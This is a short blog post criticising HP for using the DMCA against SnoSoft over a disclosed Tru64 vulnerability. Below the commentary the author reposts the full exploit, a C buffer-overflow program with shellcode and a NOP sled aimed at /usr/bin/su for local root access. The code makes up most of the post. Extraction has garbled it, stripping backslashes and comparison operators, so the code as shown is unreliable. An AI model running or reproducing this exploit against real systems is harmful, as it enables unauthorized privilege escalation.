AaronCameron.net
Wrecking things for people is important - it makes you a better person. -- Sabrina Constans
Not a Member? - Login or Create an Account...MC Offline
Saturday the 23rd of September 2017 @ 07:04am
Front Page Projects Your Profile About
[]

Filed Under: Miscellaneous

Hewlett Packard, who recently urged Bruce Perens to back down in his demonstration against the DMCA, is now using the very same law as a club to beat security experts SnoSoft for posting a security flaw in HP's Tru64.

The exploit itself, just to be precise, is attached to this post.

I will of course take it down if anyone requests :)

0001 #include stdio.h
0002 #include stdlib.h
0003 #include string.h
0004 #include unistd.h
0005 
0006 char shellcode[]= "x30x15xd9x43" "x11x74xf0x47"
0007 "x12x14x02x42" "xfcxffx32xb2"
0008 "x12x94x09x42" "xfcxffx32xb2"
0009 "xffx47x3fx26" "x1fx04x31x22"
0010 "xfcxffx30xb2" "xf7xffx1fxd2"
0011 "x10x04xffx47" "x11x14xe3x43"
0012 "x20x35x20x42" "xffxffxffxff"
0013 "x30x15xd9x43" "x31x15xd8x43"
0014 "x12x04xffx47" "x40xffx1exb6"
0015 "x48xffxfexb7" "x98xffx7fx26"
0016 "xd0x8cx73x22" "x13x05xf3x47"
0017 "x3cxffx7exb2" "x69x6ex7fx26"
0018 "x2fx62x73x22" "x38xffx7exb2"
0019 "x13x94xe7x43" "x20x35x60x42"
0020 "xffxffxffxff";
0021 
0022 main(int argc, char *argv[]) {
0023 	int i, j; char buffer[8239]; char payload[15200];
0024 	char nop[] = "x1fx04xffx47"; bzero(&buffer, 8239);
0025 	bzero(&payload, 15200);
0026 
0027 	for (i=0;i8233;i++) buffer[i] = 0x41;
0028 
0029 	buffer[i++] = 0x01; buffer[i++] = 0x04;
0030 	buffer[i++] = 0x01; buffer[i++] = 0x40;
0031 	buffer[i++] = 0x01;
0032 
0033 	for (i=0;i15000;) { for(j=0;j4;j++) { payload[i++] = nop[j]; } }
0034 	for (i=i,j=0;jsizeof(shellcode);i++,j++)payload[i] = shellcode[j];
0035 	printf("/bin/su by phasedn");
0036 	printf("payload %dbn", strlen(payload));
0037 	printf("buffer %dbn", strlen(buffer));
0038 	execl("/usr/bin/su", "su", buffer, payload, 0);
0039 } 

Share:

Keywords:

Reader Comments

©2017 Aaron Cameron